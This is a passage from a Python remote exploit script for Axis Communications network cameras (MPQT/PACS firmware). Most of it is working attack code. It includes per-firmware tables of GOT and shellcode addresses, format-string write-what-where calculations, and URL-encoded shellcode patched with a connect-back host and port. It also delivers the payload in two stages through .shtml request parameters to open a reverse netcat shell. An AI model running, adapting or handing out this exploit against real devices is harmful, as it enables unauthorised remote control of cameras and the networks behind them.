(Netcat Shell) ], # MPQT 'ARM-NCSH-5.7x': [ # 0x1c1c0, # Adjust to GOT free() address 0xf800, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" 132, # 1st POP's 0, # 2nd POP's 34, # 3rd POP's 0, # 4th POP's 'NCSH1' # Shellcode type (Netcat Shell) ], # Will go in endless loop after exit of nc shell... DoS sux # MPQT 'ARM-NCSH-5.8x': [ # 0x1b39c, # Adjust to GOT free() address 0xf8c0, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" 98, # 1st POP's 0, # 2nd POP's 34, # 3rd POP's 1, # 4th POP's 'NCSH1' # Shellcode type (Netcat Shell) ], # MPQT 'ARM-NCSH-6.1x': [ # 0x1d2a4, # Adjust to GOT free() address # 0xecc4, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" 0xecc8, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" 106, # 1st POP's 0, # 2nd POP's 34, # 3rd POP's 1, # 4th POP's 'NCSH1' # Shellcode type (Netcat Shell) ], # # Using POP format string, AKA 'Old Style' # # MPQT 'CRISv32-5.5x': [ # 0x8d148, # Adjust to GOT free() address 0x8f5a8, # .bss shellcode address 4, # 1st POP's 13, # 2nd POP's 'axis', # Aligns injected code 470, # How big buffer before shellcode 'CRISv32' # Shellcode type (Crisv32) ], # MPQT 'CRISv32-5.4x': [ # 0x8d0e0, # Adjust to GOT free() address 0x8f542, # .bss shellcode address 4, # 1st POP's 13, # 2nd POP's 'axis', # Aligns injected code 470, # How big buffer before shellcode 'CRISv32' # Shellcode type (Crisv32) ], # MPQT 'CRISv32-5.2x': [ # 0x8d0b4, # Adjust to GOT free() address 0x8f4d6, # .bss shellcode address 4, # 1st POP's 13, # 2nd POP's 'axis', # Aligns injected code 470, # How big buffer before shellcode 'CRISv32' # Shellcode type (Crisv32) ], # MPQT 'CRISv32-5.20.0': [ # 0x8d0e4, # Adjust to GOT free() address 0x8f546, # .bss shellcode address 4, # 1st POP's 13, # 2nd POP's 'axis', # Aligns injected code 470, # How big buffer before shellcode 'CRISv32' # Shellcode type (Crisv32) ] } if self.target == 0: return target_db if not self.target in target_db: print "[!] Unknown FMS key: %s!" % self.target sys.exit(1) if self.verbose: print "[Verbose] Number of availible FMS keys:",len(target_db) return target_db # # Validate correctness of HOST, IP and PORT # class Validate: def __init__(self,verbose): self.verbose = verbose # Check if IP is valid def CheckIP(self,IP): self.IP = IP ip = self.IP.split('.') if len(ip) != 4: return False for tmp in ip: if not tmp.isdigit(): return False i = int(tmp) if i < 0 or i > 255: return False return True # Check if PORT is valid def Port(self,PORT): self.PORT = PORT if int(self.PORT) < 1 or int(self.PORT) > 65535: return False else: return True # Check if HOST is valid def Host(self,HOST): self.HOST = HOST try: # Check valid IP socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP # Or we check again if it is correct typed IP if self.CheckIP(self.HOST): return self.HOST else: return False except socket.error as e: # Else check valid DNS name, and use the IP address try: self.HOST = socket.gethostbyname(self.HOST) return self.HOST except socket.error as e: return False if __name__ == '__main__': # # Help, info and pre-defined values # INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]' HTTP = "http" HTTPS = "https" proto = HTTP verbose = False noexploit = False lhost = '192.168.0.1' # Default Local HOST lport = '31337' # Default Local PORT rhost = '192.168.0.90' # Default Remote HOST rport = '80' # Default Remote PORT # Not needed for the SSI exploit, here for possible future usage. # creds = 'root:pass' creds = False # # Try to parse all arguments # try: arg_parser = argparse.ArgumentParser( # prog=sys.argv[0], prog='axis-ssid-PoC.py', description=('[*]' + INFO + '\n')) arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']') arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']') arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']') arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']') arg_parser.add_argument('--fms', required=False, help='Manual FMS key') if creds: arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']') arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]') arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]') arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]') arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose') args = arg_parser.parse_args() except Exception as e: print INFO,"\nError: %s\n" % str(e) sys.exit(1) # We want at least one argument, so print out help if len(sys.argv) == 1: arg_parser.parse_args(['-h']) print "\n[*]",INFO if args.verbose: verbose = args.verbose # Print out info from dictionary if args.dict: target = FMSdb(rhost,verbose).FMSkey(0) print "[db] Number of FMS keys:",len(target) # Print out detailed info from dictionary if verbose: print "[db] Target details of FMS Keys availible for manual xploiting" print "\n[FMS Key]\t[GOT Address]\t[BinSh Address]\t[POP1]\t[POP2]\t[POP3]\t[POP4]\t[Shellcode]" for tmp in range(0,len(target)): Key = sorted(target.keys())[tmp] temp = re.split('[-]',Key)[0:10] if temp[1] == 'NCSH': print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',target[Key][4],'\t',target[Key][5],'\t',target[Key][6] print "\n[FMS Key]\t[GOT Address]\t[BSS Address]\t[POP1]\t[POP2]\t[Align]\t[Buf]\t[Shellcode]" for tmp in range(0,len(target)): Key = sorted(target.keys())[tmp] temp = re.split('[-]',Key)[0:10] if temp[1] != 'NCSH': print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',len(target[Key][4]),'\t',target[Key][5],'\t',target[Key][6] print "\n" else: print "[db] Target FMS Keys availible for manual xploiting instead of using auto mode:" Key = "" for tmp in range(0,len(target)): Key += sorted(target.keys())[tmp] Key += ', ' print '\n',Key,'\n' sys.exit(0) # # Check validity, update if needed, of provided options # if args.https: proto = HTTPS if not args.rport: rport = '443' if creds and args.auth: creds = args.auth if args.noexploit: noexploit = args.noexploit if args.rport: rport = args.rport if args.rhost: rhost = args.rhost if args.lport: lport = args.lport if args.lhost: lhost = args.lhost # Check if LPORT is valid if not Validate(verbose).Port(lport): print "[!] Invalid LPORT - Choose between 1 and 65535" sys.exit(1) # Check if RPORT is valid if not Validate(verbose).Port(rport): print "[!] Invalid RPORT - Choose between 1 and 65535" sys.exit(1) # Check if LHOST is valid IP or FQDN, get IP back lhost = Validate(verbose).Host(lhost) if not lhost: print "[!] Invalid LHOST" sys.exit(1) # Check if RHOST is valid IP or FQDN, get IP back rhost = Validate(verbose).Host(rhost) if not rhost: print "[!] Invalid RHOST" sys.exit(1) # # Validation done, start print out stuff to the user # if noexploit: print "[i] Test mode selected, no exploiting..." if args.https: print "[i] HTTPS / SSL Mode Selected" print "[i] Remote target IP:",rhost print "[i] Remote target PORT:",rport print "[i] Connect back IP:",lhost print "[i] Connect back PORT:",lport rhost = rhost + ':' + rport # # FMS key is required into this PoC # if not args.fms: print "[!] FMS key is required!" sys.exit(1) else: Key = args.fms print "[i] Trying with FMS key:",Key # # Prepare exploiting # # Look up the FMS key in dictionary and return pointer for FMS details to use target = FMSdb(rhost,verbose).FMSkey(Key) if target[Key][6] == 'NCSH1': NCSH1 = target[Key][6] NCSH2 = "" elif target[Key][6] == 'NCSH2': NCSH2 = target[Key][6] NCSH1 = "" else: NCSH1 = "" NCSH2 = "" if Key == 'ARM-NCSH-5.8x': print "\nExploit working, but will end up in endless loop after exiting remote NCSH\nDoS sux, so I'm exiting before that shit....\n\n" sys.exit(0) print "[i] Preparing shellcode:",str(target[Key][6]) # We don't use url encoded shellcode with Netcat shell # This is for MIPS/CRISv32 and ARM shellcode if not NCSH1 and not NCSH2: FMSdata = target[Key][4] # This entry aligns the injected shellcode # Building up the url encoded shellcode for sending to the target, # and replacing LHOST / LPORT in shellcode to choosen values # part of first 500 decoded bytes will be overwritten during stage #2, and since # there is different 'tailing' on the request internally, keep it little more than needed, to be safe. # Let it be 0x00, just for fun. FMSdata += '%00' * target[Key][5] # Connect back IP to url encoded ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.'))) ip_hex = ip_hex.split() IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3]; # Let's break apart the hex code of LPORT into two bytes port_hex = hex(int(lport))[2:] port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2) port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2)) port_hex = port_hex.split() if (target[Key][6]) == 'MIPSel': # Connect back PORT if len(port_hex) == 1: PP1 = "%ff" PP0 = '%{:02x}'.format((int(port_hex[0],16)-1)) elif len(port_hex) == 2: # Little Endian PP1 = '%{:02x}'.format((int(port_hex[0],16)-1)) PP0 = '%{:02x}'.format(int(port_hex[1],16)) elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32 # Connect back PORT if len(port_hex) == 1: PP1 = "%00" PP0 = '%{:02x}'.format(int(port_hex[0],16)) elif len(port_hex) == 2: # Little Endian PP1 = '%{:02x}'.format(int(port_hex[0],16)) PP0 = '%{:02x}'.format(int(port_hex[1],16)) elif (target[Key][6]) == 'CRISv32': # Connect back PORT if len(port_hex) == 1: PP1 = "%00" PP0 = '%{:02x}'.format(int(port_hex[0],16)) elif len(port_hex) == 2: # Little Endian PP1 = '%{:02x}'.format(int(port_hex[0],16)) PP0 = '%{:02x}'.format(int(port_hex[1],16)) else: print "[!] Unknown shellcode! (%s)" % str(target[Key][6]) sys.exit(1) # Replace LHOST / LPORT in URL encoded shellcode shell = shellcode_db(rhost,verbose).sc(target[Key][6]) shell = shell.replace("IP1",IP1) shell = shell.replace("IP2",IP2) shell = shell.replace("IP3",IP3) shell = shell.replace("IP4",IP4) shell = shell.replace("PP0",PP0) shell = shell.replace("PP1",PP1) FMSdata += shell # # Calculate the FMS values to be used # # Get pre-defined values ALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS # POP_SIZE = 8 POP_SIZE = 1 GOThex = target[Key][0] BSShex = target[Key][1] GOTint = int(GOThex) # 'One-Write-Where-And-What' if not NCSH1 and not NCSH2: POP1 = target[Key][2] POP2 = target[Key][3] # Calculate for creating the FMS code ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) GOTint = (GOTint - ALREADY_WRITTEN) ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE) BSSint = int(BSShex) BSSint = (BSSint - GOTint - ALREADY_WRITTEN) # if verbose: # print "[Verbose] Calculated GOTint:",GOTint,"Calculated BSSint:",BSSint # 'Two-Write-Where-And-What' using "New Style" elif NCSH2: POP1 = target[Key][2] POP2 = target[Key][3] POP3 = target[Key][4] POP4 = target[Key][5] POP2_SIZE = 2 # We need to count higher than provided address for the jump BaseAddr = 0x10000 + BSShex # Calculate for creating the FMS code GOTint = (GOTint - ALREADY_WRITTEN) ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint # Calculate FirstWhat value FirstWhat = BaseAddr - (ALREADY_WRITTEN) ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat # Calculate SecondWhat value, so it always is 0x20300 SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE) shell = shellcode_db(rhost,verbose).sc(target[Key][6]) shell = shell.replace("LHOST",lhost) shell = shell.replace("LPORT",lport) FirstWhat = FirstWhat - len(shell) # if verbose: # print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat # 'Two-Write-Where-And-What' using "Old Style" elif NCSH1: POP1 = target[Key][2] POP2 = target[Key][3] POP3 = target[Key][4] POP4 = target[Key][5] POP2_SIZE = 2 # FirstWhat writes with 4 bytes (Y) (0x0002YYYY) # SecondWhat writes with 1 byte (Z) (0x00ZZYYYY) if BSShex > 0x10000: MSB = 1 else: MSB = 0 # We need to count higher than provided address for the jump BaseAddr = 0x10000 + BSShex # Calculate for creating the FMS code ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) GOTint = (GOTint - ALREADY_WRITTEN) ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE) # Calculate FirstWhat value FirstWhat = BaseAddr - (ALREADY_WRITTEN) ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE) # Calculate SecondWhat value, so it always is 0x203[00] or [01] SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB shell = shellcode_db(rhost,verbose).sc(target[Key][6]) shell = shell.replace("LHOST",lhost) shell = shell.replace("LPORT",lport) GOTint = GOTint - len(shell) # if verbose: # print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat else: print "[!] NCSH missing, exiting" sys.exit(1) # # Let's start the exploiting procedure # # # Stage one # if NCSH1 or NCSH2: # "New Style" needs to make the exploit in two stages if NCSH2: FMScode = do_FMS(rhost,verbose) # Writing 'FirstWhere' and 'SecondWhere' # 1st request FMScode.AddADDR(GOTint) # Run up to free() GOT address # # 1st and 2nd "Write-Where" FMScode.AddDirectParameterN(POP1) # Write 1st Where FMScode.Add("XX") # Jump up two bytes for next address FMScode.AddDirectParameterN(POP2) # Write 2nd Where FMSdata = FMScode.FMSbuild() else: FMSdata = "" print "[>] StG_1: Preparing netcat connect back shell to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata)) else: print "[>] StG_1: Sending and decoding shellcode to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata)) # Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM # Actually, any valid and public readable .shtml file will work... # (One of the two below seems always to be usable) # # For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two # For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url # try: target_url = "/httpDisabled.shtml?user_agent=" if noexploit: target_url2 = target_url else: target_url2 = "/httpDisabled.shtml?&http_user=" if NCSH2: html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell else: html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) except urllib2.HTTPError as e: if e.code == 404: print "[<] Error",e.code,e.reason target_url = "/view/viewer_index.shtml?user_agent=" if noexploit: target_url2 = target_url else: target_url2 = "/view/viewer_index.shtml?&http_user=" print "[>] Using alternative target shtml" if NCSH2: html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell else: html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) except Exception as e: if not NCSH2: print "[!] Shellcode delivery failed:",str(e) sys.exit(1) # # Stage two # # # Building and sending the FMS code to the target # print "[i] Building the FMS code..." FMScode = do_FMS(rhost,verbose) # This is an 'One-Write-Where-And-What' for FMS # # Stack Example: # # Stack content | Stack address (ASLR) # # 0x0 | @0x7e818dbc -> [POP1's] # 0x0 | @0x7e818dc0 -> [free () GOT address] # 0x7e818dd0 | @0x7e818dc4>>>>>+ "Write-Where" (%n) # 0x76f41fb8 | @0x7e818dc8 | -> [POP2's] # 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address] # 0x76f55ab8 | @0x7e818dd0<<<<<+ "Write-What" (%n) # 0x1 | @0x7e818dd4 # if not NCSH1 and not NCSH2: FMScode.AddPOP(POP1) # 1st serie of 'Old Style' POP's FMScode.AddADDR(GOTint) # GOT Address FMScode.AddWRITEn(1) # 4 bytes Write-Where # FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) FMScode.AddPOP(POP2) # 2nd serie of 'Old Style' POP's FMScode.AddADDR(BSSint) # BSS shellcode address FMScode.AddWRITEn(1) # 4 bytes Write-What # FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) # End of 'One-Write-Where-And-What' # This is an 'Two-Write-Where-And-What' for FMS # # Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd="xxx" --> # We jump over all SSI tagging to end up directly where "xxx" will # be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv()) # # The Trick here is to write lower target address, that we will jump to when calling free(), # than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT # address with two LSB writes. # elif NCSH2: # # Direct parameter access for FMS exploitation are really nice and easy to use. # However, we need to exploit in two stages with two requests. # (I was trying to avoid this "Two-Stages" so much as possibly in this exploit developement...) # # 1. Write "Two-Write-Where", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB) # 2. Write with "Two-Write-What", where 1st (LSB) and 2nd (MSB) "Write-Where" pointing to. # # With "new style", we can write with POPs independently as we don't depended of same criteria as in "NCSH1", # we can use any regular "Stack-to-Stack" pointer as we can freely choose the POP-and-Write. # [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.] # # Stack Example: # # Stack content | Stack address (ASLR) # # 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st "Write-Where" [@Stage One] # 0x76f41fb8 | @0x7e818dc8 | # 0x76f3d70c | @0x7e818dcc | # 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st "Write-What" [@Stage Two] # 0x1 | @0x7e818dd4 # [....] # 0x1c154 | @0x7e818e10 # 0x7e818e20 | @0x7e818e14>>>>>+ 2nd "Write-Where" [@Stage One] # 0x76f41fb8 | @0x7e818e18 | # 0x76f3d70c | @0x7e818e1c | # 0x76f55758 | @0x7e818e20<<<<<+ 2nd "Write-What" [@Stage Two] # 0x1 | @0x7e818e24 # FMScode.Add(shell) # # 1st and 2nd "Write-Where" already done in stage one # # 1st and 2nd "Write-What" # FMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address. FMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in MSB) FMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX) FMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation elif NCSH1: # Could use direct argument addressing here, but I like to keep "old style" as well, # as it's another interesting concept. # # Two matching stack contents -> stack address in row w/o or max two POP's between, # is needed to write two bytes higher (MSB). # # # Stack Example: # # Stack Content | @Stack Address (ASLR) # # 0x9c | @7ef2fde8 -> [POP1's] # [....] # 0x1 | @7ef2fdec -> [GOTint address] #------ # 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB] # -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer) # 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB] # ------ | | # [....] -> [POP3's] | | # 0x7fb99dc | @7ef2fe7c | | # 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX] # 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX)) # -> [POP4's] | # (nil) | @7ef2fe88 | [Count up to 0x20300] # 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX) FMScode.Add(shell) # Write FirstWhere for 'FirstWhat' FMScode.AddPOP(POP1) FMScode.AddADDR(GOTint) # Run up to free() GOT address FMScode.AddWRITEn(1) # Write SecondWhere for 'SecondWhat' # # This is special POP with 1 byte, we can maximum POP 2! # # This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement # for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes. # Kept as reference as we now using direct parameter access AKA 'New Style" for 5.2x/5.4x # if POP2 != 0: # We only want to write 'SecondWhat' two bytes higher at free() GOT if POP2 > 2: print "POP2 can't be greater than two!" sys.exit(1) if POP2 == 1: FMScode.Add("%2c") else: FMScode.Add("%1c%1c") else: FMScode.Add("XX") FMScode.AddWRITEn(1) # Write FirstWhat pointed by FirstWhere FMScode.AddPOP(POP3) # Old Style POP's FMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address. FMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB) # Write SecondWhat pointed by SecondWhere FMScode.AddPOP(POP4) # Old Style POP's FMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX) FMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation else: sys.exit(1) FMSdata = FMScode.FMSbuild() print "[>] StG_2: Writing shellcode address to free() GOT address:",'0x{:08x}'.format(GOThex),"(%d bytes)" % (len(FMSdata)) # FMS comes here, and calculations start after '=' in the url try: if NCSH1 or NCSH2: html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell else: html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode except urllib2.HTTPError as e: print "[!] Payload delivery failed:",str(e) sys.exit(1) except Exception as e: # 1st string returned by HTTP mode, 2nd by HTTPS mode if str(e) == "timed out" or str(e) == "('The read operation timed out',)": print "[i] Timeout! Payload delivered sucessfully!" else: print "[!] Payload delivery failed:",str(e) sys.exit(1) if noexploit: print "\n[*] Not exploiting, no shell...\n" else: print "\n[*] All done, enjoy the shell...\n" # # [EOF] #